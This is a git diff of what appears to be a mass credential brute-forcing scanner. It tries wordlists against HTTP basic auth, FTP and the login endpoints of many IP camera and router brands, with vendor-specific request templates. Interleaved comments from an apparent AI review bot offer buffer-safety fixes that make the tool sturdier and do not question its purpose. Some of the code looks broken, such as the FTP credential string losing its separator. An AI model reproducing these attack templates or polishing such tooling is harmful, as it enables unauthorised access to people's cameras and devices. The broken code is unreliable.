diff --git a/BasicAuth.cpp b/BasicAuth.cpp index c1179d3..7a38169 100644 --- a/BasicAuth.cpp +++ b/BasicAuth.cpp @@ -1,5 +1,4 @@ #include "BasicAuth.h" -#include "FileUpdater.h" int BA::checkOutput(const string *buffer, const char *ip, const int port) { if((Utils::ustrstr(*buffer, "200 ok") != -1 || @@ -45,7 +44,40 @@ inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode return 0; } -lopaStr BA::BABrute(const char *ip, const int port) { +std::string getLocation(const std::string *buff) { + std::string buffLower = *buff; + std::transform(buffLower.begin(), buffLower.end(), buffLower.begin(), ::tolower); + int pos1 = buffLower.find("location: "); + + if (-1 != pos1) { + std::string location = buff->substr(pos1 + 10, buff->find("\r\n", pos1) - pos1 - 10); + return location; + } + + return ""; +} + +void setNewIP(const char *ipOrig, char *ip, std::string *buff, int size) { + strncpy(ip, ipOrig, size); + const std::string &location = getLocation(buff); + if (location.size() > 0) { + if (Utils::ustrstr(location, "http") != -1) { + strncpy(ip, location.c_str(), size); + } + else { + int ipLength = (int)strstr(ipOrig + 8, "/"); + if (0 != ipLength) { + strncpy(ip, ipOrig, ipLength); + strncat(ip, location.c_str(), size - ipLength); + } + else { + strncat(ip, location.c_str(), size); + } + } + } +} + +lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) { bool digestMode = true; string lpString; lopaStr lps = {"UNKNOWN", "", ""}; 
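Review bot: In setNewIP, `int ipLength = (int)strstr(ipOrig + 8, "/");` stores a truncated pointer value rather than an offset, and that value is then the byte count for `strncpy(ip, ipOrig, ipLength)`, so the copy can run far past the 256-byte buffer the caller passes. The `strncat` calls pass the total buffer size as the third argument, although strncat takes the maximum number of characters to append, and none of the `strncpy` calls guarantees a terminating NUL. Because `location` comes from the Location header of a remote response, this is memory corruption driven by untrusted input. I would compute the offset as a pointer difference and build the result with one bounded `snprintf` per branch, as below. `ipOrig + 8` also assumes the string is at least eight characters long, which the rewrite checks.

```cpp
void setNewIP(const char *ipOrig, char *ip, std::string *buff, int size) {
	if (size <= 0) return;
	const std::string &location = getLocation(buff);
	if (location.empty()) {
		snprintf(ip, size, "%s", ipOrig);
	}
	else if (Utils::ustrstr(location, "http") != -1) {
		snprintf(ip, size, "%s", location.c_str());
	}
	else {
		// Offset of the first '/' after the scheme, or the whole string when there is none.
		const char *slash = strlen(ipOrig) > 8 ? strchr(ipOrig + 8, '/') : NULL;
		int baseLen = slash ? (int)(slash - ipOrig) : (int)strlen(ipOrig);
		snprintf(ip, size, "%.*s%s", baseLen, ipOrig, location.c_str());
	}
}
```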
@@ -56,22 +88,63 @@ lopaStr BA::BABrute(const char *ip, const int port) { std::string buff; Connector con; - int sz = con.nConnect(ip, port, &buff); - //QString ipString = QString(ip).mid(0, QString(ip).indexOf("/", 8)) + ":" + QString::number(port); - QString ipString = QString(ip); - if (sz == 0) { - //Retry - Sleep(2000); + int sz = con.nConnect(ipOrig, port, &buff); - if (sz == 0) { + char ip[256] = { 0 }; + + if (sz == 0) { + if (performDoubleCheck) { + //Retry + Sleep(gTimeOut); + sz = con.nConnect(ip, port, &buff); + if (sz == 0) { + Sleep(gTimeOut); + sz = con.nConnect(ip, port, &buff); + if (sz == 0) { + QString ipString = QString(ip); + stt->doEmitionFoundData("Empty BA probe - " + ipString + ""); + return lps; + } + else { + setNewIP(ipOrig, ip, &buff, 256); + } + } + else { + setNewIP(ipOrig, ip, &buff, 256); + } + } + else { + QString ipString = QString(ip); stt->doEmitionFoundData("Empty BA probe - " + ipString + ""); return lps; } } + else { + setNewIP(ipOrig, ip, &buff, 256); + } + int isDig = Utils::isDigest(&buff); if (isDig == -1) { - stt->doEmitionFoundData("No 401 found - " + - ipString + ""); + if (performDoubleCheck) { + Sleep(gTimeOut); + int sz = con.nConnect(ip, port, &buff); + isDig = Utils::isDigest(&buff); + if (isDig == -1) { + Sleep(gTimeOut); + int sz = con.nConnect(ip, port, &buff); + isDig = Utils::isDigest(&buff); + if (isDig == -1) { + QString ipString = QString(ip); + stt->doEmitionFoundData("No 401 found - " + ipString + ""); + return lps; + } + } + } + else { + QString ipString = QString(ip); + stt->doEmitionFoundData("No 401 found - " + ipString + ""); + return lps; + } } else if (isDig == 1) digestMode = true; else digestMode = false; @@ -99,7 +172,7 @@ lopaStr BA::BABrute(const char *ip, const int port) { if (res == -2) { if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "404"); + nesca_3::addBARow(QString(ip), "--", "404"); } else { stt->doEmitionChangeBARow(rowIndex, "--", "404"); 
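Review bot: Both "Empty BA probe" branches build `ipString` from `ip`, but `ip` is still the zero-filled `char ip[256]` at that point because setNewIP has not run, so the emitted line names no host; the same empty buffer is what the retry calls `con.nConnect(ip, port, &buff)` receive. Using `ipOrig` until setNewIP has filled `ip` keeps the message meaningful, e.g. `QString ipString = QString(ipOrig);`. The two `int sz = con.nConnect(...)` declarations in the `isDig == -1` retry block shadow the outer `sz` and are never read. The three-level nested retry would read better as a small loop with a retry count. BABrute's body continues outside the hunk.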
@@ -113,7 +186,7 @@ lopaStr BA::BABrute(const char *ip, const int port) { } if (res == 1) { if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(port), QString(loginLst[i]) + ":" + QString(passLst[j]), "OK"); + nesca_3::addBARow(QString(ip), QString(loginLst[i]) + ":" + QString(passLst[j]), "OK"); } else { stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), "OK"); @@ -127,7 +200,7 @@ lopaStr BA::BABrute(const char *ip, const int port) { if (BALogSwitched) { if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(port), + rowIndex = nesca_3::addBARow(QString(ip), QString(loginLst[i]) + ":" + QString(passLst[j]), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); } @@ -143,7 +216,7 @@ lopaStr BA::BABrute(const char *ip, const int port) { } if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL"); + nesca_3::addBARow(QString(ip), "--", "FAIL"); } else { stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); @@ -151,7 +224,7 @@ lopaStr BA::BABrute(const char *ip, const int port) { return lps; } -lopaStr BA::BALobby(const char *ip, const int port) { +lopaStr BA::BALobby(const char *ip, const int port, bool performDoubleCheck) { if(gMaxBrutingThreads > 0) { while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000); @@ -159,7 +232,7 @@ lopaStr BA::BALobby(const char *ip, const int port) { ++baCount; ++BrutingThrds; stt->doEmitionUpdateArc(gTargets); - const lopaStr &lps = BABrute(ip, port); + const lopaStr &lps = BABrute(ip, port, performDoubleCheck); --BrutingThrds; return lps; diff --git a/BasicAuth.h b/BasicAuth.h index e84f625..1a5dc4b 100644 --- a/BasicAuth.h +++ b/BasicAuth.h 
@@ -8,11 +8,11 @@ class BA { private: - static lopaStr BABrute(const char *ip, const int port); + static lopaStr BABrute(const char *ip, const int port, bool performDoubleCheck); public: static int checkOutput(const string *buffer, const char *ip, const int port); - static lopaStr BALobby(const char *ip, const int port); + static lopaStr BALobby(const char *ip, const int port, bool performDoubleCheck); }; #endif // BASICAUTH_H diff --git a/Connector.cpp b/Connector.cpp index 60f93ea..024c2f0 100644 --- a/Connector.cpp +++ b/Connector.cpp @@ -97,10 +97,18 @@ int my_trace(CURL *handle, curl_infotype type, void *userp) { if (type == CURLINFO_HEADER_OUT) { - data[size] = '\0'; - Activity += strlen(data); - stt->doEmitionAddOutData(QString(data)); + //data[size] = '\0'; + //Activity += strlen(data); + QString qData = QString(data); + Activity += qData.length(); + stt->doEmitionAddOutData(qData); + data[0] = '\0'; } + //else if (type == CURLINFO_HEADER_IN) { + // QString qData = QString(data); + // Activity += qData.length(); + // stt->doEmitionAddIncData("", qData); + //} return 0; } @@ -147,7 +155,7 @@ int pConnect(const char* ip, const int port, std::string *buffer, struct data config; config.trace_ascii = 1; /* enable ascii tracing */ curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); - curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); + //curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } curl_easy_setopt(curl, CURLOPT_URL, ip); @@ -166,6 +174,7 @@ int pConnect(const char* ip, const int port, std::string *buffer, curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); + curl_easy_setopt(curl, CURLOPT_COOKIEFILE, ""); if (postData != NULL) curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postData); 
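Review bot: In my_trace, `QString(data)` reads until it finds a NUL byte, but libcurl's debug callback hands over a buffer that is not zero-terminated, so the conversion can read past the end of that buffer now that `data[size] = '\0'` is commented out. Construct the string from the explicit length instead, `QString qData = QString::fromUtf8(data, (int)size);`, and drop `data[0] = '\0';`, which writes into a buffer owned by libcurl. This assumes the callback's `data` and `size` parameters are the ones named in the removed lines, since the signature is only partly visible in the hunk.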
@@ -200,8 +209,6 @@ int pConnect(const char* ip, const int port, std::string *buffer, curl_easy_cleanup(curl); if (res == CURLE_OK || (port == 21 && sz > 0)) { - if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); - Activity += sz; return sz; } else if (res == CURLE_LOGIN_DENIED && port == 21) { @@ -241,19 +248,12 @@ int pConnect(const char* ip, const int port, std::string *buffer, return -2; } else if (res == 8) { - stt->doEmitionFoundData("Strange ftp reply. (" + - QString::number(res) + ") " + QString(ip) + - ":" + QString::number(port)); return -2; } else if (res == 18) { - stt->doEmitionFoundData("Inappropriate file size. (" + - QString::number(res) + ") " + QString(ip) + - ":" + QString::number(port)); return -2; } - else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + - QString(ip) + ":" + QString::number(port)); + else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip)); }; //if (res == 23 && sz > 0) { 
@@ -263,6 +263,140 @@ int pConnect(const char* ip, const int port, std::string *buffer, //else return -1; } + return sz; + } + else { + stt->doEmitionRedFoundData("Curl error."); + return -1; + }; +} +int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString) +{ + buffer->clear(); + int res = 0; + CURL *curl = curl_easy_init(); + + if (curl != NULL) + { + //curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); + if (MapWidgetOpened) { + struct data config; + config.trace_ascii = 1; /* enable ascii tracing */ + curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); + curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); + curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); + } + + char newIP[128] = {0}; + strcpy(newIP, "rtsp://"); + strncat(newIP, ip, 96); + strcat(newIP, "/ch1/main"); + /*int y = curl_easy_setopt(curl, CURLOPT_VERBOSE, 0L); + y = curl_easy_setopt(curl, CURLOPT_NOPROGRESS, 1L); + y = curl_easy_setopt(curl, CURLOPT_HEADERDATA, stdout);*/ + //curl_easy_setopt(curl, CURLOPT_URL, newIP); + //curl_easy_setopt(curl, CURLOPT_PORT, port); + curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, newIP); + //y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS); + //int y = curl_easy_setopt(curl, CURLOPT_URL, ip); + //y = curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip); + //curl_easy_setopt(curl, CURLOPT_PORT, port); + /*y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS); + res = curl_easy_perform(curl); + y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE);*/ + res = curl_easy_perform(curl); + + //curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE); + //curl_easy_setopt(curl, CURLOPT_USERAGENT, + // "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"); + //curl_easy_setopt(curl, CURLOPT_HEADER, 1L); + //curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L); + //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); + 
//curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); + //curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); + //curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); + //int proxyPort = std::atoi(gProxyPort); + //if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); + //curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); + ////curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); + //curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); + //curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); + + //if (lpString != NULL) { + // curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L); + // //curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L); + // curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str()); + // //curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); + // res = curl_easy_perform(curl); + // /*if (digestMode) + // { + // curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); + // res = curl_easy_perform(curl); + + // if (port != 21 && lpString != NULL) { + // int pos = Utils::ustrstr(*buffer, "\r\n\r\n"); + // if (pos != -1) { + // *buffer = buffer->substr(pos + 4); + // } + // } + // } + // else res = curl_easy_perform(curl);*/ + //} + //else res = curl_easy_perform(curl); + + int sz = buffer->size(); + + curl_easy_cleanup(curl); + if (res == CURLE_OK || (port == 21 && sz > 0)) { + if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); + Activity += sz; + return sz; + } + else if (res == CURLE_LOGIN_DENIED && port == 21) { + return -1; + } + else if (res == CURLE_OPERATION_TIMEDOUT + || res == CURLE_COULDNT_CONNECT + || res == CURLE_SEND_ERROR + || res == CURLE_RECV_ERROR + ) { + SOCKET eNobuffSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + shutdown(eNobuffSocket, SD_BOTH); + closesocket(eNobuffSocket); + if (ENOBUFS == eNobuffSocket || ENOMEM == eNobuffSocket) { + stt->doEmitionRedFoundData("Insufficient buffer/memory space. 
Sleeping for 10 sec..."); + Sleep(10000); + } + return -1; + } + else { + if (res == 6) return -2; + else if (res != 13 && + res != 67 && + res != 52 && + res != 56 && + res != 35 && + res != 19 && + res != 23) + { + if (res == 5) { + stt->doEmitionRedFoundData("The given proxy host could not be resolved."); + return -2; + } + else if (res == 8) { + stt->doEmitionFoundData("Strange ftp reply. (" + + QString::number(res) + ") " + QString(ip)); + return -2; + } + else if (res == 18) { + return -2; + } + else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip)); + }; + + return sz; + } + if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); return sz; @@ -295,10 +429,21 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, const char *postData, const std::vector *customHeaders, const std::string *lpString, - bool digestMode){ - int res = pConnect(ip, port, buffer, postData, customHeaders, lpString, digestMode); + bool digestMode, + bool isRTSP){ + int res = 0; + + if (!isRTSP) { + res = pConnect(ip, port, buffer, postData, customHeaders, lpString, digestMode); + } + else { + res = pConnectRTSP(ip, port, buffer, lpString); + } cutoutComments(buffer); + if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); + Activity += buffer->size(); + return res; } @@ -402,8 +547,8 @@ bool portCheck(const char * sDVRIP, int wDVRPort) { else { if (gNegDebugMode) { - stt->doEmitionDebugFoundData("Port check succeeded (curl_code: " + QString::number(res) + ") [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]"); + stt->doEmitionDebugFoundData("Port check succeeded (curl_code: " + QString::number(res) + ") [" + QString(sDVRIP) + "]"); } return true; } 
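Review bot: In the timeout/connect-error branch of pConnectRTSP, `ENOBUFS == eNobuffSocket || ENOMEM == eNobuffSocket` compares a socket handle with errno constants, and does so after the handle has already gone through `shutdown` and `closesocket`, so the "Insufficient buffer/memory space" path does not reflect an actual allocation failure. Test the result of `socket()` against `INVALID_SOCKET` and read the code from `WSAGetLastError()` before closing. The function also leaves `CURLOPT_CONNECTTIMEOUT` and `CURLOPT_TIMEOUT` commented out, unlike pConnect, so `curl_easy_perform` is not bounded here, and since no write callback is set `buffer` stays empty and `sz` is always 0. The long runs of commented-out option calls are better deleted than committed.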
@@ -429,15 +574,18 @@ int Connector::connectToPort(char* ip, int port) char tempIp[128] = { 0 }; int sz = strlen(ip); if (443 == port) { - strcpy(tempIp, "https://"); + sprintf(tempIp, "https://%s:%d", ip, port); + //strcpy(tempIp, "https://"); } else if (21 == port) { - strcpy(tempIp, "ftp://"); + //strcpy(tempIp, "ftp://"); + sprintf(tempIp, "ftp://%s:%d", ip, port); } else { - strcpy(tempIp, "http://"); + //strcpy(tempIp, "http://"); + sprintf(tempIp, "http://%s:%d", ip, port); } - strncat(tempIp, ip, sz > 119 ? 119 : sz); + //strncat(tempIp, ip, sz > 96 ? 96 : sz); if (port != 37777 && port != 8000 && port != 34567 && port != 9000){ if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer); //SSH @@ -448,7 +596,7 @@ int Connector::connectToPort(char* ip, int port) ++Alive;//ME2 ++found;//PieStat Lexems lx; - lx.filler(tempIp, port, &buffer, size, &lx); + lx.filler(tempIp, ip, port, &buffer, size, &lx); } else if (size == -2) return -2; } else { @@ -456,7 +604,7 @@ int Connector::connectToPort(char* ip, int port) ++Alive;//ME2 ++found;//PieStat Lexems lx; - lx.filler(ip, port, &buffer, size, &lx); + lx.filler(ip, ip, port, &buffer, size, &lx); }; } return 0; diff --git a/Connector.h b/Connector.h index 62ef8a3..d663440 100644 --- a/Connector.h +++ b/Connector.h @@ -38,7 +38,8 @@ public: const char *postData = NULL, const std::vector *customHeaders = NULL, const std::string *lpString = NULL, - bool digestMode = false); + bool digestMode = false, + bool isRTSP = false); int connectToPort(char *ip, int port); }; #endif // CONNECTOR_H diff --git a/DrawerTh_ME2Scanner.cpp b/DrawerTh_ME2Scanner.cpp index 7cec52c..ea4d6e0 100644 --- a/DrawerTh_ME2Scanner.cpp +++ b/DrawerTh_ME2Scanner.cpp 
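Review bot: The three new `sprintf(tempIp, ...)` calls in connectToPort write an unbounded `ip` plus the port into `char tempIp[128]`, whereas the removed `strncat(tempIp, ip, sz > 119 ? 119 : sz)` capped the copy, so a long host string now overflows the stack buffer. Use the bounded form in each branch, e.g. `snprintf(tempIp, sizeof(tempIp), "https://%s:%d", ip, port);`, and treat a return value `>= sizeof(tempIp)` as an error. `int sz = strlen(ip);` is no longer read once the strncat is commented out. The function's body starts and ends outside the hunk.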
@@ -34,13 +34,14 @@ int MakePolygonLine(int gWidth) fact7 = 0; bool state = stt->isRunning(); - for(int i = 1; i < 130; ++i) + int activityVal = log(1 + Activity)/3 + 2; + for(int i = 1; i < 136; ++i) { x = qrand() % 4 + i; xtx = x + tx; if(xtx > 1 && xtx < 31) { - qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - camerasC1 * 2 - fact1 : ME2YPOS); + qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - camerasC1 * 2 - fact1 : ME2YPOS); if (camerasC1 > 0) { if(xtx < 16 ) fact1+=2; @@ -50,7 +51,7 @@ int MakePolygonLine(int gWidth) if(xtx > 34 && xtx < 72) { - qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - /*WF*/0 * 2 - fact2 : ME2YPOS); + qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - /*WF*/0 * 2 - fact2 : ME2YPOS); if(/*WF*/0 > 0) { @@ -61,7 +62,7 @@ int MakePolygonLine(int gWidth) if(xtx > 74 && xtx < 112) { - qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - baCount * 2 - fact3 : ME2YPOS); + qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - baCount * 2 - fact3 : ME2YPOS); if (baCount > 0) { @@ -72,7 +73,7 @@ int MakePolygonLine(int gWidth) if(xtx > 114 && xtx < 152) { - qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - other * 2 - fact4 : ME2YPOS); + qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - other * 2 - fact4 : ME2YPOS); if (other > 0) { @@ -83,7 +84,7 @@ int MakePolygonLine(int gWidth) if(xtx > 154 && xtx < 192) { - qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - Overl * 2 - fact5 : ME2YPOS); + qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - Overl * 2 - fact5 : ME2YPOS); if(Overl > 0) { @@ -94,7 +95,7 @@ int MakePolygonLine(int gWidth) if(xtx > 194 && xtx < 232) { - qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - /*Lowl*/0 * 2 - fact6 : ME2YPOS); + qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - /*Lowl*/0 * 2 - fact6 : ME2YPOS); if(/*Lowl*/0 > 0) { 
@@ -105,7 +106,7 @@ int MakePolygonLine(int gWidth) if(xtx > 234 && xtx < 278) { - qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - Alive * 2 - fact7 : ME2YPOS); + qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - Alive * 2 - fact7 : ME2YPOS); if(Alive > 0) { diff --git a/FTPAuth.cpp b/FTPAuth.cpp index e2cb4f1..969f4ea 100644 --- a/FTPAuth.cpp +++ b/FTPAuth.cpp @@ -37,13 +37,14 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { strcpy(pass, ftpPassLst[j]); if (strlen(pass) <= 1) continue; - lpString = string(login) + ":" + string(pass); + lpString = string(login) + + string(pass); Connector con; res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString); if (res == -2) { if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL"); + nesca_3::addBARow(QString(ip), "--", "FAIL"); } else { stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); @@ -57,7 +58,7 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n'); if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(port), QString(login) + ":" + QString(pass), "OK"); + nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK"); } else { stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK"); @@ -68,7 +69,7 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { if (BALogSwitched) { if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(port), + rowIndex = nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%"); } 
@@ -84,7 +85,7 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { } if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL"); + nesca_3::addBARow(QString(ip), "--", "FAIL"); } else { stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); diff --git a/IPCAuth.cpp b/IPCAuth.cpp index 6c79c0e..6abf528 100644 --- a/IPCAuth.cpp +++ b/IPCAuth.cpp @@ -3,7 +3,7 @@ #include "BruteUtils.h" #include "FileUpdater.h" -lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) +lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie) { lopaStr lps = {"UNKNOWN", "", ""}; bool result = true; @@ -83,6 +83,14 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) { negVector.push_back("errno=\"4\""); } + else if (strcmp(SPEC, "ACTi") == 0) + { + negVector.push_back("ERROR: "); + } + else if (strcmp(SPEC, "AirOS") == 0) + { + negVector.push_back("Invalid credentials"); + } else { stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!"); 
@@ -112,90 +120,129 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) request[0] = 0; if(strcmp(SPEC, "IPC") == 0) { - sprintf(request, "%s:%d/login.xml?user=%s&usr=%s&password=%s&pwd=%s", - ip, port, login, login, pass, pass); + sprintf(request, "%s/login.xml?user=%s&usr=%s&password=%s&pwd=%s", + ip, login, login, pass, pass); } else if(strcmp(SPEC, "GEO") == 0) { - sprintf(request, "%s:%d/Login.cgi?username=%s&password=%s", - ip, port, login, pass); + sprintf(request, "%s/Login.cgi?username=%s&password=%s", + ip, login, pass); } else if(strcmp(SPEC, "EasyCam") == 0) { - sprintf(request, "%s:%d/login.xml?user=%s&usr=%s&password=%s&pwd=%s", - ip, port, login, login, pass, pass); + sprintf(request, "%s/login.xml?user=%s&usr=%s&password=%s&pwd=%s", + ip, login, login, pass, pass); } else if(strcmp(SPEC, "Foscam") == 0) { - sprintf(request, "%s:%d/cgi-bin/CGIProxy.fcgi?usr=%s&pwd=%s&cmd=logIn&usrName=%s&pwd=%s", - ip, port, login, pass, login, pass); + sprintf(request, "%s/cgi-bin/CGIProxy.fcgi?usr=%s&pwd=%s&cmd=logIn&usrName=%s&pwd=%s", + ip, login, pass, login, pass); } else if(strcmp(SPEC, "AVIOSYS") == 0) { - sprintf(request, "%s:%d/check_user.html?UserName=%s&PassWord=%s", - ip, port, login, pass); + sprintf(request, "%s/check_user.html?UserName=%s&PassWord=%s", + ip, login, pass); } else if(strcmp(SPEC, "IPCAM") == 0) { - sprintf(request, "%s:%d/cgi-bin/hi3510/checkuser.cgi?&-name=%s&-passwd=%s&-time=1416767330831", - ip, port, login, pass); + sprintf(request, "%s/cgi-bin/hi3510/checkuser.cgi?&-name=%s&-passwd=%s&-time=1416767330831", + ip, login, pass); } else if(strcmp(SPEC, "IEORFOREFOX") == 0) { doPost = true; - sprintf(request, "%s:%d/logincheck.rsp?type=1", ip, port); + sprintf(request, "%s/logincheck.rsp?type=1", ip); sprintf(postData, "username=%s&userpwd=%s", login, pass); } else if(strcmp(SPEC, "BUFFALO") == 0) { doPost = true; - sprintf(request, "%s:%d/rpc/login", ip, port); + sprintf(request, "%s/rpc/login", ip); sprintf(postData, 
"user=%s&password=%s", login, pass); } else if (strcmp(SPEC, "DVS") == 0) { doPost = true; - sprintf(request, "%s:%d/login", ip, port); + sprintf(request, "%s/login", ip); sprintf(postData, "langs=en&user=%s&password=%s&submit=+Login+", login, pass); } else if (strcmp(SPEC, "MASPRO") == 0) { doPost = true; - sprintf(request, "%s:%d/setup_login.cgi", ip, port); + sprintf(request, "%s/setup_login.cgi", ip); sprintf(postData, "check_username=%s&check_password=%s&login=", login, pass); } else if (strcmp(SPEC, "WEBCAMXP") == 0) { doPost = true; - sprintf(request, "%s:%d/login.html", ip, port); + sprintf(request, "%s/login.html", ip); sprintf(postData, "username=%s&password=%s&Redir=/", login, pass); } else if (strcmp(SPEC, "JASSUN") == 0) { doPost = true; - sprintf(request, "%s:%d/Login.htm", ip, port); + sprintf(request, "%s/Login.htm", ip); sprintf(postData, "command=login&username=%s&password=%s", login, pass); } else if (strcmp(SPEC, "BEWARD") == 0) { - sprintf(request, "%s:%d/webs/httplogin?username=%s&password=%s&UserID=45637757", - ip, port, login, pass); + sprintf(request, "%s/webs/httplogin?username=%s&password=%s&UserID=45637757", + ip, login, pass); } else if (strcmp(SPEC, "JUAN") == 0) { //sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=&_=1450923182693", - sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693", - ip, port, login, pass); + sprintf(request, "%s/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693", + ip, login, pass); + } + else if (strcmp(SPEC, "ACTi") == 0) + { + doPost = true; + sprintf(request, "%s/cgi-bin/videoconfiguration.cgi", ip); + sprintf(postData, "LOGIN_ACCOUNT=%s&LOGIN_PASSWORD=%s", login, pass); + } + else if (strcmp(SPEC, "AirOS") == 0) + { + doPost = true; + 
